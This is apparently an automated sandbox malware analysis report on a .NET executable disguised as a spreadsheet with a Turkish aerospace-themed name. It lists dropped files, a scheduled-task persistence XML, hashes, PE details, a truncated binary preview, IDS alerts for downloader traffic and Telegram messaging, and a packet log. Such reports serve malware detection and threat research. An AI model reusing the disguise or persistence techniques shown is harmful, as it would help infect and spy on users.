SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpzdst1c.kq5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qur35mpn.hrj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tze4fb5c.skr.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvkytmxe.3cj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zwxvo1b2.zqg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp24B8.tmp

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1598
Entropy (8bit):	5.105035479081777
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLEQxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTDv
MD5:	DF4D0254AF8E92656C88D64FE33C5160
SHA1:	15499DE606224E6FC76E0AF6B9875EABB1639276
SHA-256:	930A814BBDE13189D546A90C9B8D2D7B4E7B2175F7C92D3158FBC5C1B5F396C4
SHA-512:	B2336720A4135A3B7304B84715163D271C19378F0052368964E1593A64AB5206960F3868415CE121B1EAEC529B74F555C8FBD0C3D27D25AB3A37A89F1DAD4DDE
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp387E.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1598
Entropy (8bit):	5.105035479081777
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLEQxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTDv
MD5:	DF4D0254AF8E92656C88D64FE33C5160
SHA1:	15499DE606224E6FC76E0AF6B9875EABB1639276
SHA-256:	930A814BBDE13189D546A90C9B8D2D7B4E7B2175F7C92D3158FBC5C1B5F396C4
SHA-512:	B2336720A4135A3B7304B84715163D271C19378F0052368964E1593A64AB5206960F3868415CE121B1EAEC529B74F555C8FBD0C3D27D25AB3A37A89F1DAD4DDE
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	757760
Entropy (8bit):	7.745935985520955
Encrypted:	false
SSDEEP:	12288:2YRxA4Y5lyA/BxSPCKn8QJFW7Rkw9OknmAhwXc3wx1h2zv6oAXNjQa:RRzn1JKmknmKwXcgB2zv1Al
MD5:	C9C012589D85D3610541A5C7377D5AC9
SHA1:	BC89C09FAA26CA0F12FF6FB08D6F8E4129F1A8CC
SHA-256:	800F9EC3E0B17084A4479E88FCC9089418EBD621531D1AEE2EEFBED5622A69B4
SHA-512:	79E55F17547BDAB4CAE59606CD9D7C940520D234EF43D4F47B366E2D95F3C55AD5EF3AE254EF7E702BFB774B9E3E9C46B8B7E9E156ACB72C01E4DE3F2C1C7BF2
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39% Antivirus: Virustotal, Detection: 36%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x................0.............>.... ........@.. ....................................@....................................O.......................................p............................................ ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......hK..\=......9......X............................................0..L.........}.....(.......(......(............s......(.....o......( ....o!.....(".....0..K.........}........(#........($.....,5...(............s......(.....o......(.....o!....8.....r...p.J...(%...o&...tJ.......('..........9.....s.........s(...s)...o.......o+...(,.......o-...(........o/...(0.......o1...(2.......o3...(4.......o5...(6.........(7.....(......+....s(...s)...(*........(8...........s......(..

C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.745935985520955
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
File size:	757'760 bytes
MD5:	c9c012589d85d3610541a5c7377d5ac9
SHA1:	bc89c09faa26ca0f12ff6fb08d6f8e4129f1a8cc
SHA256:	800f9ec3e0b17084a4479e88fcc9089418ebd621531d1aee2eefbed5622a69b4
SHA512:	79e55f17547bdab4cae59606cd9d7c940520d234ef43d4f47b366e2d95f3c55ad5ef3ae254ef7e702bfb774b9e3e9c46b8b7e9e156acb72c01e4de3f2c1c7bf2
SSDEEP:	12288:2YRxA4Y5lyA/BxSPCKn8QJFW7Rkw9OknmAhwXc3wx1h2zv6oAXNjQa:RRzn1JKmknmKwXcgB2zv1Al
TLSH:	C8F401593618D903C0D60BB05862C3F967792ED9EA20D703DBE93EEFBD76B4416403A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...x.................0.............>.... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4ba43e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBA96C378 [Wed Mar 13 23:23:36 2069 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
call far 0000h : 003E9999h
aas
int CCh
dec esp
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba3eb	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbc000	0x5e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb8c1c	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb8454	0xb8600	32bb825a8769f41e523705d606737235	False	0.9205799788135594	data	7.752668794858178	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbc000	0x5e0	0x600	dba2bb47b4a433860e472c657e18750b	False	0.43359375	data	4.172665010634653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbe000	0xc	0x200	04112350082604dc6e1e12bb9936a7e3	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xbc090	0x350	data			0.4268867924528302
RT_MANIFEST	0xbc3f0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T14:14:01.732780+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49713	132.226.247.73	80	TCP
2025-01-14T14:14:02.909707+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49713	132.226.247.73	80	TCP
2025-01-14T14:14:03.437400+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49715	104.21.48.1	443	TCP
2025-01-14T14:14:04.326550+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49717	132.226.247.73	80	TCP
2025-01-14T14:14:04.729960+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49720	104.21.48.1	443	TCP
2025-01-14T14:14:06.139045+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49727	132.226.247.73	80	TCP
2025-01-14T14:14:07.029675+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49727	132.226.247.73	80	TCP
2025-01-14T14:14:07.627405+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49742	104.21.48.1	443	TCP
2025-01-14T14:14:08.373419+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	49749	132.226.247.73	80	TCP
2025-01-14T14:14:08.631662+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49756	104.21.48.1	443	TCP
2025-01-14T14:14:13.415107+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.6	49799	149.154.167.220	443	TCP
2025-01-14T14:14:14.244341+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49808	104.21.48.1	443	TCP
2025-01-14T14:14:15.543423+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49822	104.21.48.1	443	TCP
2025-01-14T14:14:16.835768+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	49831	104.21.48.1	443	TCP
2025-01-14T14:14:17.738147+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.6	49836	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 14:14:00.648680925 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:00.654746056 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:00.654829025 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:00.655152082 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:00.661362886 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:01.349414110 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:01.357018948 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:01.363393068 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:01.586158991 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:01.712658882 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:01.712723970 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:01.712785006 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:01.732779980 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:01.754604101 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:01.754648924 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.231508970 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.231586933 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.306269884 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.306301117 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.306655884 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.455193043 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.499362946 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.569698095 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.569880962 CET	443	49714	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.570000887 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.601490974 CET	49714	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.604835987 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:02.609803915 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:02.818888903 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:02.827760935 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.827804089 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.827868938 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.828370094 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:02.828393936 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:02.909707069 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.303932905 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:03.311851978 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:03.311881065 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:03.437535048 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:03.437707901 CET	443	49715	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:03.437820911 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:03.438169956 CET	49715	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:03.442940950 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.444294930 CET	49717	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.447869062 CET	80	49713	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:03.447922945 CET	49713	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.449059963 CET	80	49717	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:03.449120998 CET	49717	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.449208021 CET	49717	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:03.453939915 CET	80	49717	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:04.117865086 CET	80	49717	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:04.119250059 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.119285107 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.119417906 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.119735956 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.119755983 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.326550007 CET	49717	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:04.601939917 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.603329897 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.603349924 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.730000019 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.730071068 CET	443	49720	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:04.730118036 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.730811119 CET	49720	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:04.750068903 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:04.755084038 CET	80	49721	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:04.755191088 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:04.755335093 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:04.760174036 CET	80	49721	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.075870037 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:05.080951929 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.081676960 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:05.081933975 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:05.086718082 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.430644035 CET	80	49721	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.431982994 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:05.432018995 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:05.432475090 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:05.432712078 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:05.432730913 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:05.529684067 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:05.761917114 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.766155005 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:05.770912886 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:05.898057938 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:05.899887085 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:05.899923086 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:05.976831913 CET	80	49727	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.011713028 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.011746883 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.011976957 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.016163111 CET	49734	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.016184092 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.042354107 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.042418003 CET	443	49728	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.042562962 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.042891026 CET	49728	443	192.168.2.6	104.21.48.1
Jan 14, 2025 14:14:06.045968056 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.047349930 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.050925016 CET	80	49721	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.050973892 CET	49721	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.052155972 CET	80	49735	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.052274942 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.052334070 CET	49735	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.057075024 CET	80	49735	132.226.247.73	192.168.2.6
Jan 14, 2025 14:14:06.139045000 CET	49727	80	192.168.2.6	132.226.247.73
Jan 14, 2025 14:14:06.498394012 CET	443	49734	104.21.48.1	192.168.2.6
Jan 14, 2025 14:14:06.498481989 CET	49734	443	192.168.2.6	104.21.48.1
